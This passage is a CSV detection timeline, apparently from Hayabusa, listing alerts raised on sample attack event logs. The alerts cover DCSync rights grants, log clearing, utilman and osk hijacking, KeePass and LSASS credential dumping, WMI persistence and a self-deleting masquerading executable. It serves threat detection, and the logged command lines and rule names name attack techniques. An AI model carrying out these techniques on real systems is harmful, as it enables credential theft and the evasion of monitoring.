+09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\UI0Detect.exe : Path: C:\Windows\System32\UI0Detect.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:57.627 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:58.278 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:58.288 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\PSEXESVC.exe"" : Path: C:\Windows\PSEXESVC.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:58.489 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: msg * ""hello from run key"" : Path: C:\Windows\System32\msg.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:18:58.989 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: 
C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:19:04.187 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe SYSTEM : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:19:10.796 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" : Path: C:\Windows\System32\mmc.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:20:19.155 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:20:19.205 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:20:19.295 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""c:\osk.exe"" : Path: C:\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe 
/debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:21:01.325 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" : Path: C:\Program Files\Windows Media Player\wmpnetwk.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:21:48.323 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:23:41.105 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 08:34:25.894 +09:00,PC01.example.corp,104,high,System log file was cleared,User: user01,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_104_system_log_cleared.evtx -2019-03-20 08:35:07.524 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_1102_security_log_cleared.evtx 
-2019-03-25 18:09:14.916 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ACL_ForcePwd_SPNAdd_User_Computer_Accounts.evtx -2019-03-26 06:28:11.073 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend 
Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 
-2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend 
Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx -2019-04-04 03:11:54.098 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\user01\Desktop\WMIGhost.exe"" : Path: C:\Users\user01\Desktop\WMIGhost.exe : User: PC04\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx -2019-04-04 03:11:54.178 +09:00,PC04.example.corp,20,high,Suspicious Scripting in a WMI Consumer,,rules/sigma/wmi_event/sysmon_wmi_susp_scripting.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx -2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\scrcons.exe -Embedding : Path: C:\Windows\System32\wbem\scrcons.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx -2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,high,WMI Persistence - Script Event Consumer,,rules/sigma/process_creation/win_wmi_persistence_script_event_consumer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx -2019-04-19 01:55:37.125 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe : Path: C:\Windows\Sysmon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:55:37.125 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding : Path: 
C:\Windows\System32\wbem\unsecapp.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:55:44.045 +09:00,IEWIN7,1,informational,Process Creation,"Command: sysmon -c sysmonconfig-18-apr-2019.xml : Path: C:\Users\IEUser\Desktop\Sysmon.exe : User: IEWIN7\IEUser : Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:56:08.370 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: Powershell : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:56:08.370 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:56:24.893 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery : Command: ""C:\Windows\system32\whoami.exe"" /user : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: Powershell",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:56:24.893 +09:00,IEWIN7,1,medium,Whoami 
Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:56:24.893 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:57:04.681 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1088,technique_name=Bypass User Account Control : Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" : Path: C:\Windows\System32\mmc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\eventvwr.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 02:00:09.977 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery : Command: ""C:\Windows\system32\whoami.exe"" /user : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: Powershell",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 02:00:09.977 +09:00,IEWIN7,1,medium,Whoami 
Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 02:00:09.977 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx -2019-04-28 00:57:53.368 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" : Path: C:\Users\IEUser\Downloads\Flash_update.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx -2019-04-28 00:57:53.368 +09:00,IEWIN7,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx -2019-04-28 00:57:53.837 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" : Path: C:\Users\IEUser\AppData\Roaming\NvSmart.exe : User: IEWIN7\IEUser : Parent 
Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx -2019-04-28 00:57:53.884 +09:00,IEWIN7,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx -2019-04-28 00:57:53.931 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: cmd.exe /A : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx -2019-04-28 00:57:53.931 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx -2019-04-28 00:57:54.134 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: ""C:\Windows\System32\cmd.exe"" /c del /q ""C:\Users\IEUser\Downloads\Flash_update.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx -2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: 
technique_id=T1036,technique_name=Masquerading : Command: KeeFarce.exe : Path: C:\Users\Public\KeeFarce.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx -2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx -2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx -2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx -2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx -2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx -2019-04-28 04:27:55.274 +09:00,IEWIN7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_chrome_firefox_opera_4663.evtx -2019-04-28 06:04:25.733 +09:00,DESKTOP-JR78RLP,104,high,System log file was cleared,User: jwrig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx -2019-04-28 06:06:49.341 +09:00,DESKTOP-JR78RLP,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx -2019-04-28 06:06:49.341 +09:00,DESKTOP-JR78RLP,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx -2019-04-29 01:29:42.988 +09:00,IEWIN7,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx -2019-04-29 01:29:42.988 +09:00,IEWIN7,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx -2019-04-30 05:59:14.447 +09:00,IEWIN7,18,critical,Malicious Named 
Pipe,,rules/sigma/pipe_created/sysmon_mal_namedpipes.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx -2019-04-30 05:59:21.539 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx -2019-04-30 05:59:21.539 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx -2019-04-30 05:59:21.539 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx -2019-04-30 05:59:22.144 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /all : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx -2019-04-30 05:59:22.144 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 